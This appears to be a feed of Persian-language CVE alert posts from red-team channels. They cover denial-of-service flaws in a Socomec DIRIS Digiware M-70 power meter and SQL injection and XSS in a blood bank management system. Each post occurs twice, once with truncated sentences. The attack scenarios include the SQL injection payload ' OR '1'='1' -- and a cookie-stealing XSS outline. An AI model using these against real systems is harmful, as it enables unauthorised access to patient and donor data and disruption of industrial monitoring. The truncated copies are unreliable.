🟠 Risk Level: HIGH (Score: 8.6)
گزارش تحلیل آسیبپذیری:
CVE-2024-48882عنوان: منع سرویس در تجهیزات Socomec DIRIS Digiware M-70
📄 شرح آسیبپذیری:
یک آسیبپذیری از نوع «منع سرویس» (Denial of Service) در عملکرد پروتکل
Modbus TCP دستگاه Socomec DIRIS Digiware M-70 با نسخه 1.6.9 شناسایی شده است. این ضعف امنیتی به مهاجم اجازه میدهد تا با ارسال یک بسته شبکه خاص و دستکاریشده، عملکرد دستگاه را متوقف کند.💥 تأثیر:
یک مهاجم بدون نیاز به احراز هویت (Unauthenticated) میتواند با ارسال یک بسته مخرب به دستگاه هدف، باعث از کار افتادن و عدم پاسخگویی کامل آن شود. این حمله منجر به یک وضعیت منع سرویس (DoS) شده و میتواند عملیاتهای حیاتی مانیتورینگ و کنترل صنعتی که به این تجهیز وابسته هستند را مختل سازد.
🎭 سناریوی حمله:
مهاجمی که به شبکه محلی دستگاه آسیبپذیر دسترسی دارد، یک بسته
Modbus TCP با ساختار نامعتبر را به پورت مربوطه ارسال میکند. سفتافزار (Firmware) دستگاه قادر به پردازش صحیح این بسته غیرمنتظره نبوده و دچار کرش (Crash) یا هنگ (Freeze) میشود. در این حالت، دستگاه تا زمان راهاندازی مجدد دستی (Manual Reboot) از دسترس خارج خواهد شد.🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-23417
🟠 Risk Level: HIGH (Score: 8.6)
🛡️ توضیحات آسیبپذیری:
یک آسیبپذیری از نوع "ممانعت از سرویس" (Denial of Service - DoS) با شناسه
این ضعف امنیتی در نحوه پردازش بستههای شبکه مربوط به پروتکل
مهمترین نکته این است که بهرهبرداری از این آسیبپذیری نیازی به احراز هویت ندارد و مهاجم میتواند از راه دور حمله را اجرا کند.
💥 تأثیرات:
تأثیر اصلی این آسیبپذیری، ایجاد وضعیت ممانعت از سرویس (Denial of Service) است.
در صورت بهرهبرداری موفق، دستگاه هدف از کار افتاده و دیگر به درخواستهای شبکه پاسخ نخواهد داد. این امر منجر به موارد زیر میشود:
- قطع نظارت و مانیتورینگ بر سیستمهای متصل.
- از دست رفتن دادههای عملیاتی در لحظه.
- نیاز به راهاندازی مجدد (Reboot) دستی دستگاه برای بازگرداندن سرویس به حالت عادی.
🎯 سناریوی حمله:
یک مهاجم با دسترسی به شبکه (داخلی یا از طریق اینترنت در صورت عدم وجود فایروال مناسب)، دستگاه آسیبپذیر
سپس، مهاجم یک بسته شبکه
به محض دریافت و پردازش این بسته، سرویس مربوطه در دستگاه دچار اختلال شده و از کار میافتد (Crash). در نتیجه، دستگاه تا زمان راهاندازی مجدد، از دسترس خارج میشود و ارتباط خود را با سیستمهای مدیریتی از دست میدهد.
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.6)
🛡️ توضیحات آسیبپذیری:
یک آسیبپذیری از نوع "ممانعت از سرویس" (Denial of Service - DoS) با شناسه
CVE-2025-23417 در دستگاه Socomec DIRIS Digiware M-70 با فریمور نسخه 1.6.9 شناسایی شده است.این ضعف امنیتی در نحوه پردازش بستههای شبکه مربوط به پروتکل
Modbus RTU over TCP وجود دارد. یک مهاجم میتواند با ارسال یک بسته شبکه با ساختار خاص و دستکاریشده (Specially Crafted Packet)، عملکرد دستگاه را مختل کرده و آن را از دسترس خارج کند.مهمترین نکته این است که بهرهبرداری از این آسیبپذیری نیازی به احراز هویت ندارد و مهاجم میتواند از راه دور حمله را اجرا کند.
💥 تأثیرات:
تأثیر اصلی این آسیبپذیری، ایجاد وضعیت ممانعت از سرویس (Denial of Service) است.
در صورت بهرهبرداری موفق، دستگاه هدف از کار افتاده و دیگر به درخواستهای شبکه پاسخ نخواهد داد. این امر منجر به موارد زیر میشود:
- قطع نظارت و مانیتورینگ بر سیستمهای متصل.
- از دست رفتن دادههای عملیاتی در لحظه.
- نیاز به راهاندازی مجدد (Reboot) دستی دستگاه برای بازگرداندن سرویس به حالت عادی.
🎯 سناریوی حمله:
یک مهاجم با دسترسی به شبکه (داخلی یا از طریق اینترنت در صورت عدم وجود فایروال مناسب)، دستگاه آسیبپذیر
DIRIS Digiware M-70 را شناسایی میکند.سپس، مهاجم یک بسته شبکه
Modbus مخرب و غیراستاندارد را ایجاد کرده و آن را به صورت احراز هویت نشده به پورت سرویسدهنده دستگاه ارسال میکند.به محض دریافت و پردازش این بسته، سرویس مربوطه در دستگاه دچار اختلال شده و از کار میافتد (Crash). در نتیجه، دستگاه تا زمان راهاندازی مجدد، از دسترس خارج میشود و ارتباط خود را با سیستمهای مدیریتی از دست میدهد.
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-26858
🟠 Risk Level: HIGH (Score: 8.6)
تحلیل آسیبپذیری
---
شرح آسیبپذیری:
یک آسیبپذیری از نوع سرریز بافر (Buffer Overflow) در بخش عملکرد پروتکل
تأثیر:
تأثیر اصلی این آسیبپذیری، ممانعت از سرویس (Denial of Service) است. بهرهبرداری موفق از این حفره امنیتی منجر به از کار افتادن کامل دستگاه یا سرویس
سناریوی حمله:
۱. شناسایی: مهاجم یک دستگاه آسیبپذیر
۲. ارسال بستهها: مهاجم بدون نیاز به لاگین، مجموعهای از بستههای
۳. بهرهبرداری: دستگاه به دلیل عدم اعتبارسنجی صحیح حجم دادههای ورودی، قادر به مدیریت بستههای دریافتی نیست و وضعیت سرریز بافر رخ میدهد.
۴. نتیجه: سرویس
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.6)
تحلیل آسیبپذیری
CVE-2025-26858---
شرح آسیبپذیری:
یک آسیبپذیری از نوع سرریز بافر (Buffer Overflow) در بخش عملکرد پروتکل
Modbus TCP دستگاه Socomec DIRIS Digiware M-70 با فریمور نسخه 1.6.9 شناسایی شده است. این ضعف امنیتی به یک مهاجم اجازه میدهد تا با ارسال بستههای شبکه که به صورت خاص دستکاری شدهاند، باعث سرریز شدن حافظه موقت (بافر) در دستگاه هدف شود.تأثیر:
تأثیر اصلی این آسیبپذیری، ممانعت از سرویس (Denial of Service) است. بهرهبرداری موفق از این حفره امنیتی منجر به از کار افتادن کامل دستگاه یا سرویس
Modbus TCP آن میشود. در نتیجه، دستگاه دیگر قادر به پاسخگویی به درخواستهای شبکه نخواهد بود که این امر میتواند باعث اختلال جدی در عملیات نظارت و کنترل در محیطهای صنعتی (ICS) گردد. این حمله بدون نیاز به هیچگونه احراز هویت قابل اجرا است.سناریوی حمله:
۱. شناسایی: مهاجم یک دستگاه آسیبپذیر
Socomec DIRIS Digiware M-70 را در شبکه شناسایی میکند.۲. ارسال بستهها: مهاجم بدون نیاز به لاگین، مجموعهای از بستههای
Modbus TCP دستکاریشده و مخرب را به سمت پورت مربوطه در دستگاه هدف ارسال میکند.۳. بهرهبرداری: دستگاه به دلیل عدم اعتبارسنجی صحیح حجم دادههای ورودی، قادر به مدیریت بستههای دریافتی نیست و وضعیت سرریز بافر رخ میدهد.
۴. نتیجه: سرویس
Modbus TCP دستگاه کرش کرده و از دسترس خارج میشود. برای بازگرداندن دستگاه به حالت عادی، به راهاندازی مجدد (Reboot) دستی نیاز خواهد بود.🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-55221
🟠 Risk Level: HIGH (Score: 8.6)
تحلیل آسیبپذیری |
شرح آسیبپذیری:
یک آسیبپذیری از نوع منع سرویس (Denial of Service) با شناسه
این آسیبپذیری با ارسال یک بسته شبکهی مخرب و دستکاریشده به پورت
تأثیر:
موفقیتآمیز بودن این حمله منجر به از کار افتادن کامل دستگاه (Denial of Service) میشود. در نتیجه، تمام فرآیندهای نظارتی و کنترلی که به این دستگاه وابسته هستند، متوقف شده و باعث اختلال جدی در عملیات صنعتی یا زیرساختی میگردد. این امر میتواند منجر به از دست رفتن دادههای مانیتورینگ و قطع ارتباط مدیریتی با دستگاه شود.
سناریوی حمله:
یک مهاجم غیرمجاز (unauthenticated) که به شبکه دستگاه دسترسی دارد، یک دستگاه آسیبپذیر
دستگاه به دلیل عدم توانایی در پردازش صحیح این بسته نامتعارف، دچار اختلال عملکردی شده و سرویسدهی آن به طور کامل متوقف میشود و از دسترس خارج میگردد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.6)
تحلیل آسیبپذیری |
CVE-2025-55221شرح آسیبپذیری:
یک آسیبپذیری از نوع منع سرویس (Denial of Service) با شناسه
CVE-2025-55221 در دستگاه Socomec DIRIS Digiware M-70 با نسخه فریمور 1.6.9 شناسایی شده است. این ضعف امنیتی در عملکرد پروتکلهای Modbus TCP و Modbus RTU over TCP USB وجود دارد.این آسیبپذیری با ارسال یک بسته شبکهی مخرب و دستکاریشده به پورت
502 (مربوط به Modbus TCP) فعال میشود. نکته حائز اهمیت این است که مهاجم برای اجرای این حمله نیازی به هیچگونه احراز هویت ندارد و صرفاً دسترسی به شبکه دستگاه کافی است.تأثیر:
موفقیتآمیز بودن این حمله منجر به از کار افتادن کامل دستگاه (Denial of Service) میشود. در نتیجه، تمام فرآیندهای نظارتی و کنترلی که به این دستگاه وابسته هستند، متوقف شده و باعث اختلال جدی در عملیات صنعتی یا زیرساختی میگردد. این امر میتواند منجر به از دست رفتن دادههای مانیتورینگ و قطع ارتباط مدیریتی با دستگاه شود.
سناریوی حمله:
یک مهاجم غیرمجاز (unauthenticated) که به شبکه دستگاه دسترسی دارد، یک دستگاه آسیبپذیر
Socomec DIRIS Digiware M-70 را شناسایی میکند. سپس، یک بسته شبکهی خاص و مخرب برای پروتکل Modbus TCP میسازد و آن را به پورت 502 دستگاه هدف ارسال میکند.دستگاه به دلیل عدم توانایی در پردازش صحیح این بسته نامتعارف، دچار اختلال عملکردی شده و سرویسدهی آن به طور کامل متوقف میشود و از دسترس خارج میگردد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-63532
🔴 Risk Level: CRITICAL (Score: 9.6)
🚨 تحلیل آسیبپذیری: CVE-2025-63532
گزارش تحلیل یک آسیبپذیری از نوع تزریق SQL در سیستم مدیریت بانک خون.
---
🔎 توضیحات آسیبپذیری:
یک آسیبپذیری از نوع تزریق SQL (SQL Injection) در سیستم مدیریت بانک خون نسخه 1.0 شناسایی شده است. این ضعف امنیتی در کامپوننت
مشکل اصلی این است که برنامه، ورودیهای دریافتی از کاربر (بهطور مشخص در فیلد جستجو) را به درستی اعتبارسنجی و پاکسازی (Sanitize) نمیکند. این نقص به مهاجم اجازه میدهد تا با ارسال کدهای SQL مخرب، ساختار کوئریهای پایگاه داده را دستکاری کرده و دستورات دلخواه خود را اجرا کند.
⚠️ تأثیرات:
مهاجمی که از این آسیبپذیری بهرهبرداری کند، قادر خواهد بود:
- مکانیزم ورود و احراز هویت را دور بزند و بدون نیاز به نام کاربری و رمز عبور، به پنل مدیریت دسترسی پیدا کند.
- اطلاعات حساس پایگاه داده، مانند اطلاعات اهداکنندگان و بیماران را سرقت کند.
- دادههای موجود در سیستم را تغییر داده یا حذف کند.
- در موارد حاد، کنترل کامل پایگاه داده و حتی سرور را به دست بگیرد.
🎯 سناریوی حمله:
یک مهاجم میتواند سناریوی زیر را اجرا کند:
۱. مهاجم به صفحه
۲. به جای وارد کردن یک عبارت جستجوی عادی، یک payload مخرب SQL مانند
۳. سرور این ورودی را بدون پاکسازی، مستقیماً در کوئری SQL خود قرار میدهد. شرط
۴. در نتیجه، مهاجم بدون نیاز به اطلاعات کاربری معتبر، به بخشهای حساس سیستم که نیاز به لاگین دارند، دسترسی پیدا میکند.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🔴 Risk Level: CRITICAL (Score: 9.6)
🚨 تحلیل آسیبپذیری: CVE-2025-63532
گزارش تحلیل یک آسیبپذیری از نوع تزریق SQL در سیستم مدیریت بانک خون.
---
🔎 توضیحات آسیبپذیری:
یک آسیبپذیری از نوع تزریق SQL (SQL Injection) در سیستم مدیریت بانک خون نسخه 1.0 شناسایی شده است. این ضعف امنیتی در کامپوننت
cancel.php وجود دارد.مشکل اصلی این است که برنامه، ورودیهای دریافتی از کاربر (بهطور مشخص در فیلد جستجو) را به درستی اعتبارسنجی و پاکسازی (Sanitize) نمیکند. این نقص به مهاجم اجازه میدهد تا با ارسال کدهای SQL مخرب، ساختار کوئریهای پایگاه داده را دستکاری کرده و دستورات دلخواه خود را اجرا کند.
⚠️ تأثیرات:
مهاجمی که از این آسیبپذیری بهرهبرداری کند، قادر خواهد بود:
- مکانیزم ورود و احراز هویت را دور بزند و بدون نیاز به نام کاربری و رمز عبور، به پنل مدیریت دسترسی پیدا کند.
- اطلاعات حساس پایگاه داده، مانند اطلاعات اهداکنندگان و بیماران را سرقت کند.
- دادههای موجود در سیستم را تغییر داده یا حذف کند.
- در موارد حاد، کنترل کامل پایگاه داده و حتی سرور را به دست بگیرد.
🎯 سناریوی حمله:
یک مهاجم میتواند سناریوی زیر را اجرا کند:
۱. مهاجم به صفحه
cancel.php که دارای یک فیلد جستجوی آسیبپذیر است، مراجعه میکند.۲. به جای وارد کردن یک عبارت جستجوی عادی، یک payload مخرب SQL مانند
' OR '1'='1' -- را در فیلد جستجو وارد میکند.۳. سرور این ورودی را بدون پاکسازی، مستقیماً در کوئری SQL خود قرار میدهد. شرط
'1'='1' که همیشه درست است، باعث میشود سیستم احراز هویت را نادیده بگیرد.۴. در نتیجه، مهاجم بدون نیاز به اطلاعات کاربری معتبر، به بخشهای حساس سیستم که نیاز به لاگین دارند، دسترسی پیدا میکند.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-63533
🟠 Risk Level: HIGH (Score: 8.5)
تحلیل آسیبپذیری CVE-2025-63533
---
شرح آسیبپذیری:
یک آسیبپذیری از نوع Cross-Site Scripting (XSS) در «سیستم مدیریت بانک خون نسخه ۱.۰» شناسایی شده است. این ضعف امنیتی در کامپوننتهای
برنامه ورودیهای کاربر را به درستی پاکسازی (Sanitize) یا کدگذاری (Encode) نمیکند و به مهاجم اجازه میدهد تا کدهای مخرب جاوا اسکریپت را در پارامترهایی مانند
تأثیر:
مهاجم با بهرهبرداری از این آسیبپذیری میتواند اقدامات مخرب زیر را در مرورگر کاربر قربانی انجام دهد:
- سرقت کوکیها و اطلاعات نشست (Session Hijacking)
- تغییر ظاهر صفحه برای اجرای حملات فیشینگ
- ریدایرکت کردن کاربر به وبسایتهای مخرب
- دسترسی به اطلاعات حساس کاربر که در صفحه نمایش داده میشود
- اجرای کدهای دلخواه در بستر مرورگر قربانی
سناریوی حمله:
۱. مهاجم یک کد مخرب جاوا اسکریپت (Payload) را آماده میکند. برای مثال، کدی که کوکی نشست کاربر را سرقت کرده و به سرور مهاجم ارسال میکند.
۲. مهاجم وارد بخش ویرایش پروفایل کاربری خود در سیستم شده و در یکی از فیلدهای آسیبپذیر مانند
۳. مدیر سیستم یا کاربر دیگری برای مشاهده پروفایل مهاجم به صفحه مربوطه مراجعه میکند.
۴. سرور، اطلاعات پروفایل مهاجم (شامل کد مخرب) را از پایگاه داده بازیابی کرده و بدون پاکسازی، در صفحه قربانی نمایش میدهد.
۵. کد جاوا اسکریپت مخرب در مرورگر قربانی اجرا شده، کوکی نشست او را سرقت میکند و به سرور تحت کنترل مهاجم ارسال مینماید. مهاجم اکنون میتواند با استفاده از این کوکی، به حساب کاربری قربانی دسترسی پیدا کند.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.5)
تحلیل آسیبپذیری CVE-2025-63533
---
شرح آسیبپذیری:
یک آسیبپذیری از نوع Cross-Site Scripting (XSS) در «سیستم مدیریت بانک خون نسخه ۱.۰» شناسایی شده است. این ضعف امنیتی در کامپوننتهای
updateprofile.php و rprofile.php وجود دارد.برنامه ورودیهای کاربر را به درستی پاکسازی (Sanitize) یا کدگذاری (Encode) نمیکند و به مهاجم اجازه میدهد تا کدهای مخرب جاوا اسکریپت را در پارامترهایی مانند
rname، remail، rpassword و ... تزریق کند. این کدها هنگام مشاهده صفحه توسط قربانی، در مرورگر او اجرا میشوند.تأثیر:
مهاجم با بهرهبرداری از این آسیبپذیری میتواند اقدامات مخرب زیر را در مرورگر کاربر قربانی انجام دهد:
- سرقت کوکیها و اطلاعات نشست (Session Hijacking)
- تغییر ظاهر صفحه برای اجرای حملات فیشینگ
- ریدایرکت کردن کاربر به وبسایتهای مخرب
- دسترسی به اطلاعات حساس کاربر که در صفحه نمایش داده میشود
- اجرای کدهای دلخواه در بستر مرورگر قربانی
سناریوی حمله:
۱. مهاجم یک کد مخرب جاوا اسکریپت (Payload) را آماده میکند. برای مثال، کدی که کوکی نشست کاربر را سرقت کرده و به سرور مهاجم ارسال میکند.
۲. مهاجم وارد بخش ویرایش پروفایل کاربری خود در سیستم شده و در یکی از فیلدهای آسیبپذیر مانند
rname (نام)، کد مخرب خود را به جای نام واقعی وارد و پروفایل را ذخیره میکند.۳. مدیر سیستم یا کاربر دیگری برای مشاهده پروفایل مهاجم به صفحه مربوطه مراجعه میکند.
۴. سرور، اطلاعات پروفایل مهاجم (شامل کد مخرب) را از پایگاه داده بازیابی کرده و بدون پاکسازی، در صفحه قربانی نمایش میدهد.
۵. کد جاوا اسکریپت مخرب در مرورگر قربانی اجرا شده، کوکی نشست او را سرقت میکند و به سرور تحت کنترل مهاجم ارسال مینماید. مهاجم اکنون میتواند با استفاده از این کوکی، به حساب کاربری قربانی دسترسی پیدا کند.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal